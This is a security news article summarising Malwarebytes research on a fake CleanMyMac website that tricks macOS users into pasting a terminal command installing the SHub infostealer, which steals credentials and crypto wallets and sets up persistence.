'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets

A fake utility program for macOs is tricking users into installing an infostealer malware which exfiltrates passwords, sensitive files, and even money, experts have warned. Security researchers Malwarebytes said the program was a part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.The researchers said the campaign spoofed CleanMyMac, a legitimate mac optimization program built by MacPaw, creating an almost identical website on the cleanmymacos[DOT]org domain, which makes it easy for people to mistake it for the real one. However, instead of simply downloading and running an installer, the victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.

Stealing files and establishing persistence

“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.” The malware being installed this way is called SHub, and during installation, it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and could look like something a power user would do, users might dismiss it as standard practice, the researchers explained. However, the password actually gives SHub access to the macOS Keychain, Wi-Fi credentials, app tokens, and other private keys. “With the password in hand, SHub begins a systematic sweep of the machine,” the Malwarebytes researchers said.After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files, and other valuables, it drops a stage-two backdoor which replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even enables additional crypto theft down the line. Finally, the crooks would install a LaunchAgent by spoofing a Google update service. “In practice, this gives the attackers the ability to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.